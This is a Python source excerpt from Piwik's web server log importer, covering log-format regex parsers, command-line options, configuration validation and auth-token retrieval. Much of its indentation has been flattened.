def check_format_line(self, line):
return self.match(line)
    def match(self, line):
if not self.regex:
return None
match_result = self.regex.match(line)
if match_result:
self.matched = match_result.groupdict()
else:
self.matched = None
return match_result
def get(self, key):
try:
return self.matched[key]
except KeyError:
raise BaseFormatException("Cannot find group '%s'." % key)
    def get_all(self):
return self.matched
def remove_ignored_groups(self, groups):
for group in groups:
del self.matched[group]
class W3cExtendedFormat(RegexFormat):
FIELDS_LINE_PREFIX = '#Fields: '
fields = {
'date': '(?P<date>\d+[-\d+]+',
        'time': '[\d+:]+)[.\d]*?', # TODO: should not assume date & time are adjacent; not sure how to fix ATM.
'cs-uri-stem': '(?P<path>/\S*)',
'cs-uri-query': '(?P<query_string>\S*)',
'c-ip': '"?(?P<ip>[\w*.:-]*)"?',
'cs(User-Agent)': '(?P<user_agent>".*?"|\S*)',
'cs(Referer)': '(?P<referrer>\S+)',
'sc-status': '(?P<status>\d+)',
'sc-bytes': '(?P<length>\S+)',
'cs-host': '(?P<host>\S+)',
'cs-method': '(?P<method>\S+)',
'cs-username': '(?P<userid>\S+)',
'time-taken': '(?P<generation_time_secs>[.\d]+)'
}
def __init__(self):
super(W3cExtendedFormat, self).__init__('w3c_extended', None, '%Y-%m-%d %H:%M:%S')
def check_format(self, file):
self.create_regex(file)
# if we couldn't create a regex, this file does not follow the W3C extended log file format
if not self.regex:
try:
file.seek(0)
except IOError:
pass
return
first_line = file.readline()
try:
file.seek(0)
except IOError:
pass
return self.check_format_line(first_line)
def create_regex(self, file):
fields_line = None
if config.options.w3c_fields:
fields_line = config.options.w3c_fields
# collect all header lines up until the Fields: line
# if we're reading from stdin, we can't seek, so don't read any more than the Fields line
header_lines = []
while fields_line is None:
line = file.readline().strip()
if not line:
continue
if not line.startswith('#'):
break
if line.startswith(W3cExtendedFormat.FIELDS_LINE_PREFIX):
fields_line = line
else:
header_lines.append(line)
if not fields_line:
return
# store the header lines for a later check for IIS
self.header_lines = header_lines
# Parse the 'Fields: ' line to create the regex to use
full_regex = []
expected_fields = type(self).fields.copy() # turn custom field mapping into field => regex mapping
# if the --w3c-time-taken-millisecs option is used, make sure the time-taken field is interpreted as milliseconds
if config.options.w3c_time_taken_in_millisecs:
expected_fields['time-taken'] = '(?P<generation_time_milli>[\d.]+)'
for mapped_field_name, field_name in config.options.custom_w3c_fields.iteritems():
expected_fields[mapped_field_name] = expected_fields[field_name]
del expected_fields[field_name]
# add custom field regexes supplied through --w3c-field-regex option
for field_name, field_regex in config.options.w3c_field_regexes.iteritems():
expected_fields[field_name] = field_regex
# Skip the 'Fields: ' prefix.
fields_line = fields_line[9:].strip()
for field in re.split('\s+', fields_line):
try:
regex = expected_fields[field]
except KeyError:
regex = '(?:".*?"|\S+)'
full_regex.append(regex)
full_regex = '\s+'.join(full_regex)
logging.debug("Based on 'Fields:' line, computed regex to be %s", full_regex)
self.regex = re.compile(full_regex)
def check_for_iis_option(self):
if not config.options.w3c_time_taken_in_millisecs and self._is_time_taken_milli() and self._is_iis():
logging.info("WARNING: IIS log file being parsed without --w3c-time-taken-milli option. IIS"
" stores millisecond values in the time-taken field. If your logfile does this, the aforementioned"
" option must be used in order to get accurate generation times.")
def _is_iis(self):
return len([line for line in self.header_lines if 'internet information services' in line.lower() or 'iis' in line.lower()]) > 0
def _is_time_taken_milli(self):
return 'generation_time_milli' not in self.regex.pattern
class IisFormat(W3cExtendedFormat):
fields = W3cExtendedFormat.fields.copy()
fields.update({
'time-taken': '(?P<generation_time_milli>[.\d]+)',
'sc-win32-status': '(?P<__win32_status>\S+)' # this group is useless for log importing, but capturing it
# will ensure we always select IIS for the format instead of
# W3C logs when detecting the format. This way there will be
# less accidental importing of IIS logs w/o --w3c-time-taken-milli.
})
def __init__(self):
super(IisFormat, self).__init__()
self.name = 'iis'
class ShoutcastFormat(W3cExtendedFormat):
fields = W3cExtendedFormat.fields.copy()
fields.update({
'c-status': '(?P<status>\d+)',
'x-duration': '(?P<generation_time_secs>[.\d]+)'
})
def __init__(self):
super(ShoutcastFormat, self).__init__()
self.name = 'shoutcast'
def get(self, key):
if key == 'user_agent':
user_agent = super(ShoutcastFormat, self).get(key)
return urllib2.unquote(user_agent)
else:
return super(ShoutcastFormat, self).get(key)
class AmazonCloudFrontFormat(W3cExtendedFormat):
fields = W3cExtendedFormat.fields.copy()
fields.update({
'x-event': '(?P<event_action>\S+)',
'x-sname': '(?P<event_name>\S+)',
'cs-uri-stem': '(?:rtmp:/)?(?P<path>/\S*)',
'c-user-agent': '(?P<user_agent>".*?"|\S+)',
# following are present to match cloudfront instead of W3C when we know it's cloudfront
'x-edge-location': '(?P<x_edge_location>".*?"|\S+)',
'x-edge-result-type': '(?P<x_edge_result_type>".*?"|\S+)',
'x-edge-request-id': '(?P<x_edge_request_id>".*?"|\S+)',
'x-host-header': '(?P<x_host_header>".*?"|\S+)'
})
def __init__(self):
super(AmazonCloudFrontFormat, self).__init__()
self.name = 'amazon_cloudfront'
def get(self, key):
if key == 'event_category' and 'event_category' not in self.matched:
return 'cloudfront_rtmp'
elif key == 'status' and 'status' not in self.matched:
return '200'
elif key == 'user_agent':
user_agent = super(AmazonCloudFrontFormat, self).get(key)
return urllib2.unquote(user_agent)
else:
return super(AmazonCloudFrontFormat, self).get(key)
_HOST_PREFIX = '(?P<host>[\w\-\.]*)(?::\d+)?\s+'
_COMMON_LOG_FORMAT = (
'(?P<ip>[\w*.:-]+)\s+\S+\s+(?P<userid>\S+)\s+\[(?P<date>.*?)\s+(?P<timezone>.*?)\]\s+'
'"(?P<method>\S+)\s+(?P<path>.*?)\s+\S+"\s+(?P<status>\d+)\s+(?P<length>\S+)'
)
_NCSA_EXTENDED_LOG_FORMAT = (_COMMON_LOG_FORMAT +
'\s+"(?P<referrer>.*?)"\s+"(?P<user_agent>.*?)"'
)
_S3_LOG_FORMAT = (
'\S+\s+(?P<host>\S+)\s+\[(?P<date>.*?)\s+(?P<timezone>.*?)\]\s+(?P<ip>[\w*.:-]+)\s+'
'(?P<userid>\S+)\s+\S+\s+\S+\s+\S+\s+"(?P<method>\S+)\s+(?P<path>.*?)\s+\S+"\s+(?P<status>\d+)\s+\S+\s+(?P<length>\S+)\s+'
'\S+\s+\S+\s+\S+\s+"(?P<referrer>.*?)"\s+"(?P<user_agent>.*?)"'
)
_ICECAST2_LOG_FORMAT = ( _NCSA_EXTENDED_LOG_FORMAT +
'\s+(?P<session_time>[0-9-]+)'
)
_ELB_LOG_FORMAT = (
'(?P<date>[0-9-]+T[0-9:]+)\.\S+\s+\S+\s+(?P<ip>[\w*.:-]+):\d+\s+\S+:\d+\s+\S+\s+(?P<generation_time_secs>\S+)\s+\S+\s+'
'(?P<status>\d+)\s+\S+\s+\S+\s+(?P<length>\S+)\s+'
'"\S+\s+\w+:\/\/(?P<host>[\w\-\.]*):\d+(?P<path>\/\S*)\s+[^"]+"\s+"(?P<user_agent>[^"]+)"\s+\S+\s+\S+'
)
_OVH_FORMAT = (
'(?P<ip>\S+)\s+' + _HOST_PREFIX + '(?P<userid>\S+)\s+\[(?P<date>.*?)\s+(?P<timezone>.*?)\]\s+'
'"\S+\s+(?P<path>.*?)\s+\S+"\s+(?P<status>\S+)\s+(?P<length>\S+)'
'\s+"(?P<referrer>.*?)"\s+"(?P<user_agent>.*?)"'
)
FORMATS = {
'common': RegexFormat('common', _COMMON_LOG_FORMAT),
'common_vhost': RegexFormat('common_vhost', _HOST_PREFIX + _COMMON_LOG_FORMAT),
'ncsa_extended': RegexFormat('ncsa_extended', _NCSA_EXTENDED_LOG_FORMAT),
'common_complete': RegexFormat('common_complete', _HOST_PREFIX + _NCSA_EXTENDED_LOG_FORMAT),
'w3c_extended': W3cExtendedFormat(),
'amazon_cloudfront': AmazonCloudFrontFormat(),
'iis': IisFormat(),
'shoutcast': ShoutcastFormat(),
's3': RegexFormat('s3', _S3_LOG_FORMAT),
'icecast2': RegexFormat('icecast2', _ICECAST2_LOG_FORMAT),
'elb': RegexFormat('elb', _ELB_LOG_FORMAT, '%Y-%m-%dT%H:%M:%S'),
'nginx_json': JsonFormat('nginx_json'),
'ovh': RegexFormat('ovh', _OVH_FORMAT)
}
##
## Code.
##
class Configuration(object):
"""
Stores all the configuration options by reading sys.argv and parsing,
    if needed, the config.ini.php file.
It has 2 attributes: options and filenames.
"""
class Error(Exception):
pass
def _create_parser(self):
"""
Initialize and return the OptionParser instance.
"""
option_parser = optparse.OptionParser(
usage='Usage: %prog [options] log_file [ log_file [...] ]',
description="Import HTTP access logs to Piwik. "
"log_file is the path to a server access log file (uncompressed, .gz, .bz2, or specify - to read from stdin). "
" You may also import many log files at once (for example set log_file to *.log or *.log.gz)."
" By default, the script will try to produce clean reports and will exclude bots, static files, discard http error and redirects, etc. This is customizable, see below.",
epilog="About Piwik Server Log Analytics: https://piwik.org/log-analytics/ "
" Found a bug? Please create a ticket in https://dev.piwik.org/ "
" Please send your suggestions or successful user story to hello@piwik.org "
)
# Basic auth user
option_parser.add_option(
'--auth-user', dest='auth_user',
help="Basic auth user",
)
# Basic auth password
option_parser.add_option(
'--auth-password', dest='auth_password',
help="Basic auth password",
)
option_parser.add_option(
'--debug', '-d', dest='debug', action='count', default=0,
help="Enable debug output (specify multiple times for more verbose)",
)
option_parser.add_option(
'--debug-tracker', dest='debug_tracker', action='store_true', default=False,
help="Appends &debug=1 to tracker requests and prints out the result so the tracker can be debugged. If "
"using the log importer results in errors with the tracker or improperly recorded visits, this option can "
"be used to find out what the tracker is doing wrong. To see debug tracker output, you must also set the "
"[Tracker] debug_on_demand INI config to 1 in your Piwik's config.ini.php file."
)
option_parser.add_option(
'--debug-request-limit', dest='debug_request_limit', type='int', default=None,
help="Debug option that will exit after N requests are parsed. Can be used w/ --debug-tracker to limit the "
"output of a large log file."
)
option_parser.add_option(
'--url', dest='piwik_url',
help="REQUIRED Your Piwik server URL, eg. http://example.com/piwik/ or http://analytics.example.net",
)
option_parser.add_option(
'--api-url', dest='piwik_api_url',
help="This URL will be used to send API requests (use it if your tracker URL differs from UI/API url), "
"eg. http://other-example.com/piwik/ or http://analytics-api.example.net",
)
option_parser.add_option(
'--dry-run', dest='dry_run',
action='store_true', default=False,
help="Perform a trial run with no tracking data being inserted into Piwik",
)
option_parser.add_option(
'--show-progress', dest='show_progress',
action='store_true', default=os.isatty(sys.stdout.fileno()),
help="Print a progress report X seconds (default: 1, use --show-progress-delay to override)"
)
option_parser.add_option(
'--show-progress-delay', dest='show_progress_delay',
type='int', default=1,
help="Change the default progress delay"
)
option_parser.add_option(
'--add-sites-new-hosts', dest='add_sites_new_hosts',
action='store_true', default=False,
help="When a hostname is found in the log file, but not matched to any website "
"in Piwik, automatically create a new website in Piwik with this hostname to "
"import the logs"
)
option_parser.add_option(
'--idsite', dest='site_id',
help= ("When specified, "
"data in the specified log files will be tracked for this Piwik site ID."
" The script will not auto-detect the website based on the log line hostname (new websites will not be automatically created).")
)
option_parser.add_option(
'--idsite-fallback', dest='site_id_fallback',
help="Default Piwik site ID to use if the hostname doesn't match any "
"known Website's URL. New websites will not be automatically created. "
" Used only if --add-sites-new-hosts or --idsite are not set",
)
default_config = os.path.abspath(
os.path.join(os.path.dirname(__file__),
'../../config/config.ini.php'),
)
option_parser.add_option(
'--config', dest='config_file', default=default_config,
help=(
"This is only used when --login and --password is not used. "
"Piwik will read the configuration file (default: %default) to "
"fetch the Super User token_auth from the config file. "
)
)
option_parser.add_option(
'--login', dest='login',
help="You can manually specify the Piwik Super User login"
)
option_parser.add_option(
'--password', dest='password',
help="You can manually specify the Piwik Super User password"
)
option_parser.add_option(
'--token-auth', dest='piwik_token_auth',
help="Piwik user token_auth, the token_auth is found in Piwik > Settings > API. "
"You must use a token_auth that has at least 'admin' or 'super user' permission. "
"If you use a token_auth for a non admin user, your users' IP addresses will not be tracked properly. "
)
option_parser.add_option(
'--hostname', dest='hostnames', action='append', default=[],
help="Accepted hostname (requests with other hostnames will be excluded). "
" You may use the star character * "
" Example: --hostname=*domain.com"
" Can be specified multiple times"
)
option_parser.add_option(
'--exclude-path', dest='excluded_paths', action='append', default=[],
help="Any URL path matching this exclude-path will not be imported in Piwik. "
" You must use the star character *. "
" Example: --exclude-path=*/admin/*"
" Can be specified multiple times. "
)
option_parser.add_option(
'--exclude-path-from', dest='exclude_path_from',
help="Each line from this file is a path to exclude. Each path must contain the character * to match a string. (see: --exclude-path)"
)
option_parser.add_option(
'--include-path', dest='included_paths', action='append', default=[],
help="Paths to include. Can be specified multiple times. If not specified, all paths are included."
)
option_parser.add_option(
'--include-path-from', dest='include_path_from',
help="Each line from this file is a path to include"
)
option_parser.add_option(
'--useragent-exclude', dest='excluded_useragents',
action='append', default=[],
help="User agents to exclude (in addition to the standard excluded "
"user agents). Can be specified multiple times",
)
option_parser.add_option(
'--enable-static', dest='enable_static',
action='store_true', default=False,
help="Track static files (images, css, js, ico, ttf, etc.)"
)
option_parser.add_option(
'--enable-bots', dest='enable_bots',
action='store_true', default=False,
help="Track bots. All bot visits will have a Custom Variable set with name='Bot' and value='$Bot_user_agent_here$'"
)
option_parser.add_option(
'--enable-http-errors', dest='enable_http_errors',
action='store_true', default=False,
help="Track HTTP errors (status code 4xx or 5xx)"
)
option_parser.add_option(
'--enable-http-redirects', dest='enable_http_redirects',
action='store_true', default=False,
help="Track HTTP redirects (status code 3xx except 304)"
)
option_parser.add_option(
'--enable-reverse-dns', dest='reverse_dns',
action='store_true', default=False,
help="Enable reverse DNS, used to generate the 'Providers' report in Piwik. "
"Disabled by default, as it impacts performance"
)
option_parser.add_option(
'--strip-query-string', dest='strip_query_string',
action='store_true', default=False,
help="Strip the query string from the URL"
)
option_parser.add_option(
'--query-string-delimiter', dest='query_string_delimiter', default='?',
help="The query string delimiter (default: %default)"
)
option_parser.add_option(
'--log-format-name', dest='log_format_name', default=None,
help=("Access log format to detect (supported are: %s). "
"When not specified, the log format will be autodetected by trying all supported log formats."
% ', '.join(sorted(FORMATS.iterkeys())))
)
available_regex_groups = ['date', 'path', 'query_string', 'ip', 'user_agent', 'referrer', 'status',
'length', 'host', 'userid', 'generation_time_milli', 'event_action',
'event_name', 'timezone', 'session_time']
option_parser.add_option(
'--log-format-regex', dest='log_format_regex', default=None,
help="Regular expression used to parse log entries. Regexes must contain named groups for different log fields. "
"Recognized fields include: %s. For an example of a supported Regex, see the source code of this file. "
"Overrides --log-format-name." % (', '.join(available_regex_groups))
)
option_parser.add_option(
'--log-date-format', dest='log_date_format', default=None,
help="Format string used to parse dates. You can specify any format that can also be specified to "
"the strptime python function."
)
option_parser.add_option(
'--log-hostname', dest='log_hostname', default=None,
help="Force this hostname for a log format that doesn't include it. All hits "
"will seem to come to this host"
)
option_parser.add_option(
'--skip', dest='skip', default=0, type='int',
help="Skip the n first lines to start parsing/importing data at a given line for the specified log file",
)
option_parser.add_option(
'--recorders', dest='recorders', default=1, type='int',
help="Number of simultaneous recorders (default: %default). "
"It should be set to the number of CPU cores in your server. "
"You can also experiment with higher values which may increase performance until a certain point",
)
option_parser.add_option(
'--recorder-max-payload-size', dest='recorder_max_payload_size', default=200, type='int',
help="Maximum number of log entries to record in one tracking request (default: %default). "
)
option_parser.add_option(
'--replay-tracking', dest='replay_tracking',
action='store_true', default=False,
help="Replay piwik.php requests found in custom logs (only piwik.php requests expected). \nSee https://piwik.org/faq/how-to/faq_17033/"
)
option_parser.add_option(
'--replay-tracking-expected-tracker-file', dest='replay_tracking_expected_tracker_file', default='piwik.php',
help="The expected suffix for tracking request paths. Only logs whose paths end with this will be imported. Defaults "
"to 'piwik.php' so only requests to the piwik.php file will be imported."
)
option_parser.add_option(
'--output', dest='output',
help="Redirect output (stdout and stderr) to the specified file"
)
option_parser.add_option(
'--encoding', dest='encoding', default='utf8',
help="Log files encoding (default: %default)"
)
option_parser.add_option(
'--disable-bulk-tracking', dest='use_bulk_tracking',
default=True, action='store_false',
help="Disables use of bulk tracking so recorders record one hit at a time."
)
option_parser.add_option(
'--debug-force-one-hit-every-Ns', dest='force_one_action_interval', default=False, type='float',
help="Debug option that will force each recorder to record one hit every N secs."
)
option_parser.add_option(
'--force-lowercase-path', dest='force_lowercase_path', default=False, action='store_true',
help="Make URL path lowercase so paths with the same letters but different cases are "
"treated the same."
)
option_parser.add_option(
'--enable-testmode', dest='enable_testmode', default=False, action='store_true',
help="If set, it will try to get the token_auth from the piwik_tests directory"
)
option_parser.add_option(
'--download-extensions', dest='download_extensions', default=None,
help="By default Piwik tracks as Downloads the most popular file extensions. If you set this parameter (format: pdf,doc,...) then files with an extension found in the list will be imported as Downloads, other file extensions downloads will be skipped."
)
option_parser.add_option(
'--add-download-extensions', dest='extra_download_extensions', default=None,
help="Add extensions that should be treated as downloads. See --download-extensions for more info."
)
option_parser.add_option(
'--w3c-map-field', action='callback', callback=functools.partial(self._set_option_map, 'custom_w3c_fields'), type='string',
help="Map a custom log entry field in your W3C log to a default one. Use this option to load custom log "
"files that use the W3C extended log format such as those from the Advanced Logging W3C module. Used "
"as, eg, --w3c-map-field my-date=date. Recognized default fields include: %s\n\n"
"Formats that extend the W3C extended log format (like the cloudfront RTMP log format) may define more "
"fields that can be mapped."
% (', '.join(W3cExtendedFormat.fields.keys()))
)
option_parser.add_option(
'--w3c-time-taken-millisecs', action='store_true', default=False, dest='w3c_time_taken_in_millisecs',
help="If set, interprets the time-taken W3C log field as a number of milliseconds. This must be set for importing"
" IIS logs."
)
option_parser.add_option(
'--w3c-fields', dest='w3c_fields', default=None,
help="Specify the '#Fields:' line for a log file in the W3C Extended log file format. Use this option if "
"your log file doesn't contain the '#Fields:' line which is required for parsing. This option must be used "
"in conjuction with --log-format-name=w3c_extended.\n"
"Example: --w3c-fields='#Fields: date time c-ip ...'"
)
option_parser.add_option(
'--w3c-field-regex', action='callback', callback=functools.partial(self._set_option_map, 'w3c_field_regexes'), type='string',
help="Specify a regex for a field in your W3C extended log file. You can use this option to parse fields the "
"importer does not natively recognize and then use one of the --regex-group-to-XXX-cvar options to track "
"the field in a custom variable. For example, specifying --w3c-field-regex=sc-win32-status=(?P<win32_status>\\S+) "
"--regex-group-to-page-cvar=\"win32_status=Windows Status Code\" will track the sc-win32-status IIS field "
"in the 'Windows Status Code' custom variable. Regexes must contain a named group."
)
option_parser.add_option(
'--title-category-delimiter', dest='title_category_delimiter', default='/',
help="If --enable-http-errors is used, errors are shown in the page titles report. If you have "
"changed General.action_title_category_delimiter in your Piwik configuration, you need to set this "
"option to the same value in order to get a pretty page titles report."
)
option_parser.add_option(
'--dump-log-regex', dest='dump_log_regex', action='store_true', default=False,
help="Prints out the regex string used to parse log lines and exists. Can be useful for using formats "
"in newer versions of the script in older versions of the script. The output regex can be used with "
"the --log-format-regex option."
)
option_parser.add_option(
'--ignore-groups', dest='regex_groups_to_ignore', default=None,
help="Comma separated list of regex groups to ignore when parsing log lines. Can be used to, for example, "
"disable normal user id tracking. See documentation for --log-format-regex for list of available "
"regex groups."
)
option_parser.add_option(
'--regex-group-to-visit-cvar', action='callback', callback=functools.partial(self._set_option_map, 'regex_group_to_visit_cvars_map'), type='string',
help="Track an attribute through a custom variable with visit scope instead of through Piwik's normal "
"approach. For example, to track usernames as a custom variable instead of through the uid tracking "
"parameter, supply --regex-group-to-visit-cvar=\"userid=User Name\". This will track usernames in a "
"custom variable named 'User Name'. The list of available regex groups can be found in the documentation "
"for --log-format-regex (additional regex groups you may have defined "
"in --log-format-regex can also be used)."
)
option_parser.add_option(
'--regex-group-to-page-cvar', action='callback', callback=functools.partial(self._set_option_map, 'regex_group_to_page_cvars_map'), type='string',
help="Track an attribute through a custom variable with page scope instead of through Piwik's normal "
"approach. For example, to track usernames as a custom variable instead of through the uid tracking "
"parameter, supply --regex-group-to-page-cvar=\"userid=User Name\". This will track usernames in a "
"custom variable named 'User Name'. The list of available regex groups can be found in the documentation "
"for --log-format-regex (additional regex groups you may have defined "
"in --log-format-regex can also be used)."
)
option_parser.add_option(
'--track-http-method', dest='track_http_method', default=False,
help="Enables tracking of http method as custom page variable if method group is available in log format."
)
option_parser.add_option(
'--retry-max-attempts', dest='max_attempts', default=PIWIK_DEFAULT_MAX_ATTEMPTS, type='int',
help="The maximum number of times to retry a failed tracking request."
)
option_parser.add_option(
'--retry-delay', dest='delay_after_failure', default=PIWIK_DEFAULT_DELAY_AFTER_FAILURE, type='int',
help="The number of seconds to wait before retrying a failed tracking request."
)
option_parser.add_option(
'--request-timeout', dest='request_timeout', default=DEFAULT_SOCKET_TIMEOUT, type='int',
help="The maximum number of seconds to wait before terminating an HTTP request to Piwik."
)
option_parser.add_option(
'--include-host', action='callback', type='string', callback=functools.partial(self._add_to_array, 'include_host'),
help="Only import logs from the specified host(s)."
)
option_parser.add_option(
'--exclude-host', action='callback', type='string', callback=functools.partial(self._add_to_array, 'exclude_host'),
help="Only import logs that are not from the specified host(s)."
)
option_parser.add_option(
'--exclude-older-than', action='callback', type='string', default=None, callback=functools.partial(self._set_date, 'exclude_older_than'),
help="Ignore logs older than the specified date. Exclusive. Date format must be YYYY-MM-DD hh:mm:ss +/-0000. The timezone offset is required."
)
option_parser.add_option(
'--exclude-newer-than', action='callback', type='string', default=None, callback=functools.partial(self._set_date, 'exclude_newer_than'),
help="Ignore logs newer than the specified date. Exclusive. Date format must be YYYY-MM-DD hh:mm:ss +/-0000. The timezone offset is required."
)
option_parser.add_option(
'--accept-invalid-ssl-certificate',
dest='accept_invalid_ssl_certificate', action='store_true',
default=False,
help="Do not verify the SSL / TLS certificate when contacting the Piwik server. This is the default when running on Python 2.7.8 or older."
)
return option_parser
def _set_date(self, option_attr_name, option, opt_str, value, parser):
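        # Parses a "YYYY-MM-DD hh:mm:ss +/-HHMM" value and stores the equivalent UTC
        # datetime on parser.values, e.g. '2016-01-01 00:00:00 +0100' is stored as
        # datetime(2015, 12, 31, 23, 0).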
try:
(date_str, timezone) = value.rsplit(' ', 1)
except:
fatal_error("Invalid date value '%s'." % value)
if not re.match('[-+][0-9]{4}', timezone):
fatal_error("Invalid date value '%s': expected valid timzeone like +0100 or -1200, got '%s'" % (value, timezone))
        # The offset is +/-HHMM: split out hours and minutes instead of dividing
        # by 100, which would mishandle half-hour offsets like +0530.
        offset = int(timezone)
        hours, minutes = divmod(abs(offset), 100)
        date = datetime.datetime.strptime(date_str, '%Y-%m-%d %H:%M:%S')
        delta = datetime.timedelta(hours=hours, minutes=minutes)
        date = date - delta if offset >= 0 else date + delta
setattr(parser.values, option_attr_name, date)
def _add_to_array(self, option_attr_name, option, opt_str, value, parser):
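        # Callback for repeatable options: each occurrence appends its value, so
        # passing --include-host twice leaves a two-element list on parser.values.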
if not hasattr(parser.values, option_attr_name) or not getattr(parser.values, option_attr_name):
setattr(parser.values, option_attr_name, [])
getattr(parser.values, option_attr_name).append(value)
def _set_option_map(self, option_attr_name, option, opt_str, value, parser):
"""
Sets a key-value mapping in a dict that is built from command line options. Options that map
string keys to string values (like --w3c-map-field) can set the callback to a bound partial
of this method to handle the option.
"""
parts = value.split('=')
if len(parts) != 2:
fatal_error("Invalid %s option: '%s'" % (opt_str, value))
key, value = parts
if not hasattr(parser.values, option_attr_name):
setattr(parser.values, option_attr_name, {})
getattr(parser.values, option_attr_name)[key] = value
def _parse_args(self, option_parser):
"""
Parse the command line args and create self.options and self.filenames.
"""
self.options, self.filenames = option_parser.parse_args(sys.argv[1:])
if self.options.output:
sys.stdout = sys.stderr = open(self.options.output, 'a+', 0)
if not self.filenames:
print(option_parser.format_help())
sys.exit(1)
# Configure logging before calling logging.{debug,info}.
logging.basicConfig(
format='%(asctime)s: [%(levelname)s] %(message)s',
level=logging.DEBUG if self.options.debug >= 1 else logging.INFO,
)
self.options.excluded_useragents = set([s.lower() for s in self.options.excluded_useragents])
if self.options.exclude_path_from:
paths = [path.strip() for path in open(self.options.exclude_path_from).readlines()]
self.options.excluded_paths.extend(path for path in paths if len(path) > 0)
if self.options.excluded_paths:
self.options.excluded_paths = set(self.options.excluded_paths)
logging.debug('Excluded paths: %s', ' '.join(self.options.excluded_paths))
if self.options.include_path_from:
paths = [path.strip() for path in open(self.options.include_path_from).readlines()]
self.options.included_paths.extend(path for path in paths if len(path) > 0)
if self.options.included_paths:
self.options.included_paths = set(self.options.included_paths)
logging.debug('Included paths: %s', ' '.join(self.options.included_paths))
if self.options.hostnames:
logging.debug('Accepted hostnames: %s', ', '.join(self.options.hostnames))
else:
logging.debug('Accepted hostnames: all')
if self.options.log_format_regex:
self.format = RegexFormat('custom', self.options.log_format_regex, self.options.log_date_format)
elif self.options.log_format_name:
try:
self.format = FORMATS[self.options.log_format_name]
except KeyError:
fatal_error('invalid log format: %s' % self.options.log_format_name)
else:
self.format = None
if not hasattr(self.options, 'custom_w3c_fields'):
self.options.custom_w3c_fields = {}
elif self.format is not None:
# validate custom field mappings
for custom_name, default_name in self.options.custom_w3c_fields.iteritems():
if default_name not in type(self.format).fields:
fatal_error("custom W3C field mapping error: don't know how to parse and use the '%s' field" % default_name)
return
if not hasattr(self.options, 'regex_group_to_visit_cvars_map'):
self.options.regex_group_to_visit_cvars_map = {}
if not hasattr(self.options, 'regex_group_to_page_cvars_map'):
self.options.regex_group_to_page_cvars_map = {}
if not hasattr(self.options, 'w3c_field_regexes'):
self.options.w3c_field_regexes = {}
else:
# make sure each custom w3c field regex has a named group
for field_name, field_regex in self.options.w3c_field_regexes.iteritems():
if '(?P<' not in field_regex:
fatal_error("cannot find named group in custom w3c field regex '%s' for field '%s'" % (field_regex, field_name))
return
if not self.options.piwik_url:
fatal_error('no URL given for Piwik')
if not (self.options.piwik_url.startswith('http://') or self.options.piwik_url.startswith('https://')):
self.options.piwik_url = 'http://' + self.options.piwik_url
logging.debug('Piwik Tracker API URL is: %s', self.options.piwik_url)
if not self.options.piwik_api_url:
self.options.piwik_api_url = self.options.piwik_url
if not (self.options.piwik_api_url.startswith('http://') or self.options.piwik_api_url.startswith('https://')):
self.options.piwik_api_url = 'http://' + self.options.piwik_api_url
logging.debug('Piwik Analytics API URL is: %s', self.options.piwik_api_url)
if self.options.recorders < 1:
self.options.recorders = 1
download_extensions = DOWNLOAD_EXTENSIONS
if self.options.download_extensions:
download_extensions = set(self.options.download_extensions.split(','))
if self.options.extra_download_extensions:
download_extensions.update(self.options.extra_download_extensions.split(','))
self.options.download_extensions = download_extensions
if self.options.regex_groups_to_ignore:
self.options.regex_groups_to_ignore = set(self.options.regex_groups_to_ignore.split(','))
def __init__(self):
self._parse_args(self._create_parser())
def _get_token_auth(self):
"""
If the token auth is not specified in the options, get it from Piwik.
"""
# Get superuser login/password from the options.
logging.debug('No token-auth specified')
if self.options.login and self.options.password:
piwik_login = self.options.login
piwik_password = hashlib.md5(self.options.password).hexdigest()
logging.debug('Using credentials: (login = %s, password = %s)', piwik_login, piwik_password)
try:
api_result = piwik.call_api('UsersManager.getTokenAuth',
userLogin=piwik_login,
md5Password=piwik_password,
_token_auth='',
_url=self.options.piwik_api_url,
)
except urllib2.URLError as e:
fatal_error('error when fetching token_auth from the API: %s' % e)
try:
return api_result['value']
except KeyError:
# Happens when the credentials are invalid.
message = api_result.get('message')
fatal_error(
'error fetching authentication token token_auth%s' % (
': %s' % message if message else '')
)
else:
# Fallback to the given (or default) configuration file, then
# get the token from the API.
logging.debug(
'No credentials specified, reading them from "%s"',
self.options.config_file,
)
config_file = ConfigParser.RawConfigParser()
success = len(config_file.read(self.options.config_file)) > 0
if not success:
fatal_error(
"the configuration file" + self.options.config_file + " could not be read. Please check permission. This file must be readable by the user running this script to get the authentication token"
)
updatetokenfile = os.path.abspath(
os.path.join(os.path.dirname(__file__),
'../../misc/cron/updatetoken.php'),
)
phpBinary = 'php'
is_windows = sys.platform.startswith('win')
if is_windows:
try:
processWin = subprocess.Popen('where php.exe', stdout=subprocess.PIPE, stderr=subprocess.PIPE)
[stdout, stderr] = processWin.communicate()
if processWin.returncode == 0:
phpBinary = stdout.strip()
else:
fatal_error("We couldn't detect PHP. It might help to add your php.exe to the path or alternatively run the importer using the --login and --password option")
except:
fatal_error("We couldn't detect PHP. You can run the importer using the --login and --password option to fix this issue")
command = [phpBinary, updatetokenfile]
if self.options.enable_testmode:
command.append('--testmode')
hostname = urlparse.urlparse( self.options.piwik_url ).hostname
command.append('--piwik-domain=' + hostname )
command = subprocess.list2cmdline(command)
# logging.debug(command);
process = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
[stdout, stderr] = process.communicate()
if process.returncode != 0:
fatal_error("`" + command + "` failed with error: " + stderr + ".\nReponse code was: " + str(process.returncode) + ". You can alternatively run the importer using the --login and --password option")
filename = stdout
credentials = open(filename, 'r').readline()
credentials = credentials.split('\t')
return credentials[1]
def get_resolver(self):
if self.options.site_id:
logging.debug('Resolver: static')
return StaticResolver(self.options.site_id)
else:
logging.debug('Resolver: dynamic')
return DynamicResolver()
def init_token_auth(self):
if not self.options.piwik_token_auth:
try:
self.options.piwik_token_auth = self._get_token_auth()
except Piwik.Error as e:
fatal_error(e)
logging.debug('Authentication token token_auth is: %s', self.options.piwik_token_auth)
class Statistics(object):
"""
Store statistics about parsed logs and recorded entries.
Can optionally print statistics on standard output every second.
"""
class Counter(object):
"""
Plain integer counters are not safe to increment from multiple threads. See:
http://stackoverflow.com/questions/6320107/are-python-ints-thread-safe
"""
def __init__(self):
# itertools.count's implementation in C does not release the GIL and
# therefore is thread-safe.
self.counter = itertools.count(1)
self.value = 0
def increment(self):
self.value = self.counter.next()
def advance(self, n):
for i in range(n):
self.increment()
def __str__(self):
return str(int(self.value))
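# Illustrative usage (not executed by the importer): the Counter can be
# shared between recorder threads without a lock.
#
#   c = Statistics.Counter()
#   c.increment()   # c.value == 1
#   c.advance(3)    # c.value == 4
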